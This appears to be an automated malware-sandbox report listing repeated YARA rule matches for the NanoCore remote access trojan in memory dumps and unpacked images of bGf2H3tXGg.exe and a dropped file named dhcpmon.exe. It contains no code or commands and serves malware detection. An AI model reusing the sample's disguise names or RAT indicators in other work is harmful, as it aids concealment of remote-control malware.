        Source: 00000016.00000002.338595453.00000000005A8000.00000004.00000020.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000016.00000002.338595453.00000000005A8000.00000004.00000020.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000003.00000002.486901430.0000000000658000.00000004.00000020.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000003.00000002.486901430.0000000000658000.00000004.00000020.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000011.00000002.322659318.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000011.00000002.322659318.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000E.00000002.318855204.000000000351C000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: bGf2H3tXGg.exe PID: 4656, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: bGf2H3tXGg.exe PID: 4656, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: bGf2H3tXGg.exe PID: 6468, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: bGf2H3tXGg.exe PID: 6468, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: bGf2H3tXGg.exe PID: 6704, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: bGf2H3tXGg.exe PID: 6704, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: bGf2H3tXGg.exe PID: 204, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: bGf2H3tXGg.exe PID: 204, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: dhcpmon.exe PID: 6212, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: dhcpmon.exe PID: 6212, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: dhcpmon.exe PID: 6816, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: dhcpmon.exe PID: 6816, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: dhcpmon.exe PID: 6600, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: dhcpmon.exe PID: 6600, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: dhcpmon.exe PID: 6752, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: dhcpmon.exe PID: 6752, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 22.2.dhcpmon.exe.24bcc88.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 11.2.bGf2H3tXGg.exe.29c1458.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 11.2.bGf2H3tXGg.exe.29c1458.3.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 3.1.bGf2H3tXGg.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 3.1.bGf2H3tXGg.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 14.2.bGf2H3tXGg.exe.4960000.9.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 14.2.bGf2H3tXGg.exe.4960000.9.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 14.2.bGf2H3tXGg.exe.34e5530.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 14.2.bGf2H3tXGg.exe.34e5530.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 17.2.dhcpmon.exe.3565530.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 17.2.dhcpmon.exe.3565530.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 3.2.bGf2H3tXGg.exe.373c0d6.13.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 3.2.bGf2H3tXGg.exe.4e70000.16.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 3.2.bGf2H3tXGg.exe.4e70000.16.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 14.2.bGf2H3tXGg.exe.4960000.9.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 14.2.bGf2H3tXGg.exe.4960000.9.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 3.2.bGf2H3tXGg.exe.2457edc.5.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 17.2.dhcpmon.exe.35de3de.9.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 17.2.dhcpmon.exe.35de3de.9.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 3.2.bGf2H3tXGg.exe.37332a7.15.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 3.2.bGf2H3tXGg.exe.37332a7.15.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 22.2.dhcpmon.exe.2430000.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 22.2.dhcpmon.exe.2430000.4.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 12.2.dhcpmon.exe.28b0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.2.dhcpmon.exe.28b0000.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 3.2.bGf2H3tXGg.exe.374a506.14.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 15.2.dhcpmon.exe.2870000.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 15.2.dhcpmon.exe.2870000.3.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 22.1.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 22.1.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 22.2.dhcpmon.exe.3495530.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 22.2.dhcpmon.exe.3495530.7.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 17.2.dhcpmon.exe.24c0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 17.2.dhcpmon.exe.24c0000.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 3.2.bGf2H3tXGg.exe.340c550.8.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 14.2.bGf2H3tXGg.exe.254b998.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 11.2.bGf2H3tXGg.exe.29b0000.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 11.2.bGf2H3tXGg.exe.29b0000.4.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 17.2.dhcpmon.exe.3565530.6.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 17.2.dhcpmon.exe.3565530.6.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 17.2.dhcpmon.exe.35e3214.8.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 22.2.dhcpmon.exe.350e3de.10.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 22.2.dhcpmon.exe.350e3de.10.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 3.2.bGf2H3tXGg.exe.21d0000.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 3.2.bGf2H3tXGg.exe.21d0000.3.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 14.2.bGf2H3tXGg.exe.3563214.6.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.2.dhcpmon.exe.28c1458.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.2.dhcpmon.exe.28c1458.3.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 22.2.dhcpmon.exe.351783d.9.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 14.1.bGf2H3tXGg.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 14.1.bGf2H3tXGg.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 14.2.bGf2H3tXGg.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 14.2.bGf2H3tXGg.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 14.2.bGf2H3tXGg.exe.4a80000.10.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 14.2.bGf2H3tXGg.exe.4a80000.10.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 12.2.dhcpmon.exe.28b0000.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.2.dhcpmon.exe.28b0000.4.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 14.2.bGf2H3tXGg.exe.34e5530.5.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 14.2.bGf2H3tXGg.exe.34e5530.5.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 12.2.dhcpmon.exe.28c1458.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.2.dhcpmon.exe.28c1458.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 14.2.bGf2H3tXGg.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 14.2.bGf2H3tXGg.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 22.2.dhcpmon.exe.415058.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 22.2.dhcpmon.exe.415058.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 17.2.dhcpmon.exe.24c0000.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 17.2.dhcpmon.exe.24c0000.3.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 22.2.dhcpmon.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 22.2.dhcpmon.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 15.2.dhcpmon.exe.2881458.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 15.2.dhcpmon.exe.2881458.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 15.2.dhcpmon.exe.2870000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 15.2.dhcpmon.exe.2870000.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 17.2.dhcpmon.exe.415058.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 17.2.dhcpmon.exe.415058.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 14.2.bGf2H3tXGg.exe.3563214.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 17.2.dhcpmon.exe.525980.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 17.2.dhcpmon.exe.525980.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 22.2.dhcpmon.exe.23b0000.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 22.2.dhcpmon.exe.23b0000.3.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 14.2.bGf2H3tXGg.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 14.2.bGf2H3tXGg.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 22.2.dhcpmon.exe.24fba7c.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 22.2.dhcpmon.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 22.2.dhcpmon.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 17.2.dhcpmon.exe.35e783d.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 3.2.bGf2H3tXGg.exe.21d0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 3.2.bGf2H3tXGg.exe.21d0000.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0.2.bGf2H3tXGg.exe.29c1458.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0.2.bGf2H3tXGg.exe.29c1458.3.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 3.2.bGf2H3tXGg.exe.24787c8.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 3.2.bGf2H3tXGg.exe.24787c8.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 3.2.bGf2H3tXGg.exe.673878.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 3.2.bGf2H3tXGg.exe.673878.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 14.2.bGf2H3tXGg.exe.356783d.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 3.2.bGf2H3tXGg.exe.373c0d6.13.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 14.2.bGf2H3tXGg.exe.355e3de.8.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 11.2.bGf2H3tXGg.exe.29b0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 22.1.dhcpmon.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 14.2.bGf2H3tXGg.exe.355e3de.8.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 11.2.bGf2H3tXGg.exe.29b0000.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 22.1.dhcpmon.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 17.2.dhcpmon.exe.258cc88.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 3.2.bGf2H3tXGg.exe.23fca20.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 14.1.bGf2H3tXGg.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 14.1.bGf2H3tXGg.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0.2.bGf2H3tXGg.exe.29b0000.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0.2.bGf2H3tXGg.exe.29b0000.4.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 22.2.dhcpmon.exe.3495530.7.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 22.2.dhcpmon.exe.3495530.7.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 17.2.dhcpmon.exe.415058.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 17.2.dhcpmon.exe.415058.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 17.2.dhcpmon.exe.35e3214.8.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 22.2.dhcpmon.exe.5c6ad8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 22.2.dhcpmon.exe.5c6ad8.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 22.1.dhcpmon.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 22.1.dhcpmon.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 3.2.bGf2H3tXGg.exe.340c550.8.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 3.2.bGf2H3tXGg.exe.415058.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 3.2.bGf2H3tXGg.exe.415058.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 3.2.bGf2H3tXGg.exe.673878.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 3.2.bGf2H3tXGg.exe.673878.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 3.2.bGf2H3tXGg.exe.3470831.12.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 22.2.dhcpmon.exe.3513214.8.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 17.2.dhcpmon.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 17.2.dhcpmon.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 17.2.dhcpmon.exe.25cba7c.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 3.2.bGf2H3tXGg.exe.2457edc.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 3.2.bGf2H3tXGg.exe.2457edc.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 3.2.bGf2H3tXGg.exe.346c208.11.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 17.2.dhcpmon.exe.525980.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 17.2.dhcpmon.exe.525980.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 14.2.bGf2H3tXGg.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 14.2.bGf2H3tXGg.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 3.2.bGf2H3tXGg.exe.2464158.7.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 3.2.bGf2H3tXGg.exe.346c208.11.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 22.2.dhcpmon.exe.3513214.8.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 3.2.bGf2H3tXGg.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 3.2.bGf2H3tXGg.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 3.1.bGf2H3tXGg.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 3.1.bGf2H3tXGg.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 3.2.bGf2H3tXGg.exe.374a506.14.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 14.2.bGf2H3tXGg.exe.872728.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 14.2.bGf2H3tXGg.exe.872728.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 17.2.dhcpmon.exe.4a60000.10.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 17.2.dhcpmon.exe.4a60000.10.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 3.2.bGf2H3tXGg.exe.37332a7.15.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 3.2.bGf2H3tXGg.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 3.2.bGf2H3tXGg.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0.2.bGf2H3tXGg.exe.29b0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0.2.bGf2H3tXGg.exe.29b0000.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 14.2.bGf2H3tXGg.exe.250cc3c.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 14.2.bGf2H3tXGg.exe.872728.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 14.2.bGf2H3tXGg.exe.872728.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 22.2.dhcpmon.exe.415058.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 22.2.dhcpmon.exe.415058.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 3.1.bGf2H3tXGg.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 3.1.bGf2H3tXGg.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 15.2.dhcpmon.exe.2881458.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 15.2.dhcpmon.exe.2881458.4.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 3.2.bGf2H3tXGg.exe.341adf4.9.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 14.1.bGf2H3tXGg.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 14.1.bGf2H3tXGg.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 3.2.bGf2H3tXGg.exe.34111ef.10.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 22.2.dhcpmon.exe.5c6ad8.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 22.2.dhcpmon.exe.5c6ad8.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 11.2.bGf2H3tXGg.exe.29c1458.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 11.2.bGf2H3tXGg.exe.29c1458.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 22.2.dhcpmon.exe.23b0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 22.2.dhcpmon.exe.23b0000.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0.2.bGf2H3tXGg.exe.29c1458.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0.2.bGf2H3tXGg.exe.29c1458.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 17.2.dhcpmon.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 17.2.dhcpmon.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 3.2.bGf2H3tXGg.exe.415058.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
